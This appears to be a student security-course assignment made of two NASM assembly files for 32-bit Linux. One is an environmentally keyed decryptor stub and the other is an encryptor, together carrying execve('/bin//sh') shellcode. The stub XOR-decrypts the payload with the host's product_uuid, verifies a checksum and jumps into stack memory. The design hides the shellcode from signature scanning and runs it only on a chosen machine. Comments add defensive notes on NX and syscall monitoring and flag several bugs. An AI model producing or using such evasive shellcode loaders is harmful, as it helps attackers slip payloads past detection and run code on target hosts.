encryptor shellcode
;--------------------------------------------
; Name: Josh Bundt
; Class: IA6120
; Assignment 9
; File: decrypt_uuid.asm
; Last modified: 19 Mar 2019
;---------------------------------------------
; nasm -f bin decrypt_uuid.asm
; Environmentally keyed decryptor stub (flat binary, 32-bit Linux, int 0x80).
; Stages: (1) copy the 32-byte encrypted payload that follows `shellcode:`
; into a stack buffer, (2) read 32 bytes of the host's product_uuid file as
; the XOR key, (3) decrypt in place, (4) verify a 32-bit byte-sum checksum and
; only then jump into the buffer; on any mismatch the stub exits quietly.
; The payload is produced by shellcode_enc_uuid.asm (further down this page).
; Register roles: ebp = frame base, [ebp-4] = stack buffer address,
; [ebp-48..ebp-17] = 32-byte key buffer, esi/edi = string-op source/dest.
SYS_READ equ 0x03
SYS_WRITE equ 0x04 ; not used in this file
SYS_OPEN equ 0x05
SYS_EXECVE equ 0x0B ; not used in this file (execve lives in the payload)
SYS_MMAP equ 0x5a ; not used in this file
SYS_BRK equ 0x7d ; not used in this file; NOTE(review): the encryptor's main on this page uses 0x2d for sys_brk, so this value looks wrong
USE32
section .text
mov ebp, esp ; ebp = frame base (stack pointer on entry)
sub sp, 1023 ; local variable area. NOTE(review): 16-bit subtract on sp - only the low 16 bits of esp change; if they are below 1023 the result wraps and esp ends up above the frame instead of below it
and esp, -16 ; 16-byte align stack
mov [ebp-4], esp ; [ebp-4] = address of the stack buffer that receives the payload
cld ; string ops (movsd/lodsd/stosd) count upward
xor ecx, ecx ; ecx = 0
jmp short get_shellcode ; the call at get_shellcode pushes the payload address and comes back here
got_shellcode:
pop esi ; esi = address of the encrypted payload (the incbin below)
mov edi, [ebp-4] ; edi = stack buffer (this copy lives on the stack, not on a heap)
mov cl, 8 ; 8 dwords = 32 bytes: 28 bytes of code + 4-byte checksum
rep movsd ; copy the encrypted payload into the stack buffer
xor eax, eax ; eax = 0
mov edx, eax ; mode = 0 (ignored without O_CREAT)
mov ecx, eax ; flags = O_RDONLY (0)
jmp get_uuid ; same call/pop trick to obtain the address of the path string
got_uuid:
pop ebx ; ebx = pathname (uuid string below)
mov al, SYS_OPEN ; eax = SYS_OPEN (only al is written; the upper bits are already zero)
int 0x80 ; eax = open(ebx, ecx, edx); a negative -errno result is not checked here (see the read below)
xor edx, edx ; edx = 0
mov dl, 32 ; count = 32 bytes of key material
lea ecx, [ebp-48] ; buf = [ebp-48..ebp-17], the key buffer
mov ebx, eax ; fd = open's return value (negative if open failed)
xor eax, eax
mov al, SYS_READ
int 0x80 ; read(ebx, ecx, edx); after a failed open this fails too, the key buffer keeps whatever was on the stack, the checksum below fails and the stub exits - it fails closed
xor ebx, ebx ; ebx = key dword index (0..3)
mov ecx, ebx ; ecx = 0
mov cl, 8 ; ecx = 8 dwords to process (whole 32-byte buffer, checksum dword included)
mov esi, [ebp-4] ; in place: source is the stack buffer ...
mov edi, [ebp-4] ; ... and so is the destination
decrypt:
mov edx, [ebp+ebx*4-48] ; edx = key dword [ebx]  (key[i mod 4])
lodsd ; eax = next encrypted dword
xor eax, edx ; decrypt
stosd ; write it back in place
inc ebx ; next key dword
and bl, 0x03 ; ebx = ebx mod 4 (ebx never exceeds 4, so masking bl is enough)
dec ecx
test ecx, ecx ; dwords remaining?
jnz decrypt
mov bl, 28 ; checksum covers the first 28 bytes (ebx is 0 after 8 iterations mod 4)
xor eax, eax ; eax = 0 so that lodsb, which writes only al, yields a zero-extended byte
mov esi, [ebp-4] ; esi = decrypted buffer; ecx is 0 here and becomes the accumulator
check:
lodsb ; al = next byte
add ecx, eax ; ecx += byte
dec ebx ; bytes remaining
test bl, bl
jnz check
not ecx ; ecx = ~sum, the form the encryptor stores
lodsd ; eax = stored checksum (bytes 28..31; esi is at offset 28 after the loop)
cmp ecx, eax ; equal only if the key file content matches the one used at encryption time
jnz exit
mov eax, [ebp-4] ; eax = decrypted code in the stack buffer
jmp eax ; transfer control into the stack buffer. NOTE(defence): this needs an executable stack; under NX/W^X the jump faults here whatever the key, so that mitigation stops this stage before the payload runs
exit:
xor eax, eax ; eax = 0
mov ebx, eax ; status = 0
inc eax ; eax = 1 = sys_exit
int 0x80 ; exit(0): a checksum mismatch ends silently with a success status
get_shellcode:
call got_shellcode ; pushes the address of the bytes that follow (the payload) and returns to got_shellcode
shellcode:
incbin "shellcode_encrypted" ; 32 bytes written by the encryptor program below
ret ; NOTE(review): appears unreachable - control goes to the stack copy, never here
get_uuid:
call got_uuid ; pushes the address of the uuid string
;uuid db '/sys/class/dmi/id/product_uuid',0
uuid db 'product_uuid',0 ; relative test stand-in; the real sysfs path above is commented out (on many systems that file is readable only by root - confirm on the system under test)
;--------------------------------------------
; Name: Josh Bundt
; Class: IA6120
; Assignment 9
; File: shellcode_enc_uuid.asm
; Last modified: 19 Mar 2019
;---------------------------------------------
; nasm -f elf shellcode_enc_uuid.asm
; ld -melf_i386 -o encryptor shellcode_enc_uuid.o
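; Linux i386 system call numbers (int 0x80: eax = number, args in ebx, ecx, edx)
SYS_EXIT equ 0x01
SYS_READ equ 0x03
SYS_WRITE equ 0x04
SYS_OPEN equ 0x05
SYS_EXECVE equ 0x0B
SYS_BRK equ 0x2d ; was 0x7d, which is not brk; main below uses 0x2d (45) for sys_brk
USE32
global _start
section .data
; example product_uuid DD524D56-CD3E-FA50-6CBD-2EA4812B680D
; the real sysfs path is commented out; the relative name is a stand-in for testing
; uuid db '/sys/class/dmi/id/product_uuid',0
uuid db 'product_uuid',0 ; key file read by main
uuid_len equ $ - uuid ; not referenced by the code on this page
sc_enc db 'shellcode_encrypted',0 ; output file written by main
sc_end_len equ $ - sc_enc ; not referenced by the code on this page
section .bss
buffer: resb 128 ; not referenced by the code on this page
section .text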
;--------------------------------------------
; Process entry point: exit(main(argc, argv)).
; The kernel leaves argc at [esp] and the argv array starting at [esp+4].
;--------------------------------------------
_start:
        lea     eax, [esp + 4]          ; argv = address of the argv array
        push    eax                     ; arg2 - argv
        push    dword [esp + 4]         ; arg1 - argc (shifted down by the push above)
        call    main                    ; eax = main(argc, argv)
        add     esp, 8                  ; discard the two arguments
        mov     ebx, eax                ; exit status = main's return value
        mov     eax, 1                  ; sys_exit
        int     0x80                    ; exit(ebx) - does not return
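;--------------------------------------------
; int l_read(int fd, char *buf, int len);
; read up to len bytes from file descriptor fd into buf.
; Return the number of bytes actually read (0 at end of file), or -errno
; on failure - this is the raw syscall, errno is not set.
; cdecl: ebx is preserved; eax, ecx, edx and flags are clobbered.
;--------------------------------------------
l_read:
        push    ebp                     ; save caller's frame pointer
        mov     ebp, esp                ; set up frame pointer
        push    ebx                     ; ebx is callee-saved
        mov     edx, [ebp + 16]         ; arg3 - int len
        mov     ecx, [ebp + 12]         ; arg2 - char *buf
        mov     ebx, [ebp + 8]          ; arg1 - int fd
        mov     eax, SYS_READ           ; named constant instead of the bare 3
        int     0x80                    ; eax = read(ebx, ecx, edx)
        pop     ebx                     ; restore ebx
        pop     ebp                     ; restore caller's frame pointer (no locals, so esp is already ebp)
        ret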
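;--------------------------------------------
; int l_write(int fd, char *buf, int len);
; write len bytes from buf to file descriptor fd.
; Return the number of bytes actually written (may be less than len), or
; -errno on failure - this is the raw syscall, errno is not set.
; cdecl: ebx is preserved; eax, ecx, edx and flags are clobbered.
;--------------------------------------------
l_write:
        push    ebp                     ; save caller's frame pointer
        mov     ebp, esp                ; set up frame pointer
        push    ebx                     ; ebx is callee-saved
        mov     edx, [ebp + 16]         ; arg3 - int len
        mov     ecx, [ebp + 12]         ; arg2 - char *buf
        mov     ebx, [ebp + 8]          ; arg1 - int fd
        mov     eax, SYS_WRITE          ; named constant instead of the bare 4
        int     0x80                    ; eax = write(ebx, ecx, edx)
        pop     ebx                     ; restore ebx
        pop     ebp                     ; restore caller's frame pointer (no locals, so esp is already ebp)
        ret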
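;--------------------------------------------
; int l_open(char *filename, int flags, int mode);
; open the file named by filename (a NUL-terminated path) with the given
; open(2) flags. mode is the permission set applied when flags include
; O_CREAT and is otherwise ignored; every caller on this page passes all
; three arguments.
; Return the new file descriptor, or -errno on failure (raw syscall).
; cdecl: ebx is preserved; eax, ecx, edx and flags are clobbered.
;--------------------------------------------
l_open:
        push    ebp                     ; save caller's frame pointer
        mov     ebp, esp                ; set up frame pointer
        push    ebx                     ; ebx is callee-saved
        mov     edx, [ebp + 16]         ; arg3 - int mode
        mov     ecx, [ebp + 12]         ; arg2 - int flags
        mov     ebx, [ebp + 8]          ; arg1 - char *filename
        mov     eax, SYS_OPEN           ; named constant instead of the bare 5
        int     0x80                    ; eax = open(ebx, ecx, edx)
        pop     ebx                     ; restore ebx
        pop     ebp                     ; restore caller's frame pointer (no locals, so esp is already ebp)
        ret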
;--------------------------------------------
; int l_exit(int rc);
; terminate the calling program with exit status rc. Never returns, so no
; frame is built: the argument is read straight off the caller's stack.
; Not referenced by the code on this page.
;--------------------------------------------
l_exit:
        mov     eax, 1                  ; sys_exit
        mov     ebx, [esp + 4]          ; arg1 - int rc
        int     0x80                    ; exit(ebx)
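;--------------------------------------------
; int main(int argc, char **argv);
; Build shellcode_encrypted: copy the 32-byte plaintext payload to the heap,
; store ~(byte sum of the first 28 bytes) in the last dword, XOR every dword
; with the 32-byte key read from the uuid file (key dword = i mod 4) and
; write the result to sc_enc. argc/argv are not used.
; Return 0 on success, 1 if brk/open/read/write fails or moves fewer than
; 32 bytes (previously failures were ignored, so an unreadable key file
; silently encrypted with stack garbage).
; Frame: [ebp-4] = saved ebx, [ebp-8] = heap buffer address,
;        [ebp-48..ebp-17] = 32-byte key buffer.
;--------------------------------------------
main:
        push    ebp                     ; save caller's frame pointer
        mov     ebp, esp                ; set up frame pointer
        push    ebx                     ; [ebp-4] = saved ebx (was overwritten by the heap address before)
        sub     esp, 1024               ; local variable area
        ; -- reserve 4096 bytes of heap: brk(0) returns the current break, brk(old + 4096) extends it
        xor     ebx, ebx                ; brk(NULL)
        mov     eax, 0x2d               ; sys_brk = 45; literal kept because the file-level SYS_BRK equ (0x7d) disagrees with it
        int     0x80
        mov     [ebp-8], eax            ; heap buffer = old break
        lea     ebx, [eax + 4096]       ; requested new break
        mov     eax, 0x2d               ; sys_brk
        int     0x80                    ; eax = brk(ebx): new break on success, unchanged break on failure
        cmp     eax, ebx
        jne     .fail
        ; -- copy the plaintext payload into the heap buffer
        cld                             ; string ops count upward
        mov     esi, shellcode          ; src = plaintext payload in .text
        mov     edi, [ebp-8]            ; dst = heap buffer
        mov     ecx, 8                  ; 8 dwords = 32 bytes (28 code + 4-byte checksum slot)
        rep     movsd
        ; -- read the 32-byte key from the uuid file
        xor     eax, eax
        push    eax                     ; mode (ignored without O_CREAT)
        push    eax                     ; flags = O_RDONLY
        push    uuid                    ; pathname
        call    l_open                  ; eax = open(uuid, O_RDONLY, 0)
        add     esp, 12
        test    eax, eax                ; negative = -errno (e.g. the key file is unreadable)
        js      .fail
        push    32                      ; count
        lea     ebx, [ebp-48]
        push    ebx                     ; buf = key buffer
        push    eax                     ; fd
        call    l_read                  ; eax = read(fd, key, 32)
        add     esp, 12
        cmp     eax, 32                 ; a short read would leave part of the key as stack garbage
        jne     .fail
        ; -- checksum: ~sum of the first 28 bytes, stored at offset 28
        xor     ecx, ecx                ; running sum (explicit; it used to rely on l_read leaving ecx == ebx)
        xor     eax, eax                ; lodsb writes only al, so clear the upper bits once
        mov     ebx, 28                 ; bytes to sum
        mov     esi, [ebp-8]            ; esi = payload
.check:
        lodsb                           ; al = next byte
        add     ecx, eax
        dec     ebx                     ; dec sets ZF, no separate test needed
        jnz     .check
        not     ecx                     ; complement, the form the decryptor compares against
        mov     eax, ecx
        mov     edi, esi                ; esi is at offset 28 = checksum slot
        stosd
        ; -- encrypt in place: dword[i] ^= key[i mod 4] for all 8 dwords
        xor     ebx, ebx                ; key index (already 0 after the loop; made explicit)
        mov     ecx, 8
        mov     esi, [ebp-8]
        mov     edi, [ebp-8]
.encrypt:
        mov     edx, [ebp+ebx*4-48]     ; edx = key dword [ebx]
        lodsd
        xor     eax, edx
        stosd
        inc     ebx
        and     bl, 0x03                ; ebx = ebx mod 4
        dec     ecx
        jnz     .encrypt
        ; -- write the 32 encrypted bytes
        push    664q                    ; mode 0664
        push    0x242                   ; O_RDWR|O_CREAT|O_TRUNC
        push    sc_enc                  ; output filename
        call    l_open                  ; eax = open(sc_enc, O_RDWR|O_CREAT|O_TRUNC, 0664)
        add     esp, 12
        test    eax, eax
        js      .fail
        push    32                      ; count
        push    dword [ebp-8]           ; buf = encrypted payload on the heap (not the key buffer)
        push    eax                     ; fd
        call    l_write                 ; eax = write(fd, heap, 32)
        add     esp, 12
        cmp     eax, 32
        jne     .fail
        xor     eax, eax                ; rc = 0
.done:
        lea     esp, [ebp-4]            ; drop locals, leaving saved ebx on top
        pop     ebx                     ; restore callee-saved ebx
        pop     ebp                     ; restore caller's frame pointer
        ret
.fail:
        mov     eax, 1                  ; rc = 1
        jmp     .done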
;syscall %eax %ebx,%ecx,%edx
;----------- ---- ---------------------------------------------------------------
;exec x00b ->path="/bin//sh",->[->a0=path,0]
;
; Plaintext payload: execve("/bin//sh", ["/bin//sh", NULL], NULL).
; `main` copies 32 bytes (8 dwords) starting at `shellcode` to the heap, sums
; the first 28, stores the complemented sum at offset 28 and XOR-encrypts all
; 32 bytes, so the instructions plus nop padding must occupy 28 bytes with
; the last four bytes free for the checksum slot - the trailing nops appear
; to provide that padding; confirm the byte count with a listing (`nasm -l`)
; whenever this block is edited.
; Detection note: the two pushed immediates spell "/bin//sh" and, with the
; `mov al, SYS_EXECVE` / `int 0x80` pair, form a widely signatured pattern;
; the XOR layer only hides it at rest, so syscall-level monitoring (an
; execve issued from a stack address) is the durable control.
shellcode:
xor eax,eax ; eax = 0 (NUL terminator and zero-extended syscall number)
sub esp, 127 ; move esp below the code; presumably keeps the pushes below from overwriting the code when it runs from the stack buffer - TODO confirm
push eax ; NUL terminator for the path string
push 0x68732f2f ; "//sh"
push 0x6e69622f ; "/bin" -> esp now points at "/bin//sh\0"
mov ebx, esp ; ebx = path = argv[0]
push eax ; argv[1] = NULL
push ebx ; argv[0] = path
mov ecx, esp ; ecx = argv
cdq ; edx = 0 (sign-extension of eax) = envp
mov al, SYS_EXECVE
int 0x80 ; execve(ebx, ecx, edx) - does not return on success
nop ; padding: see the header comment (28-byte code region + checksum slot)
nop
nop
nop
nop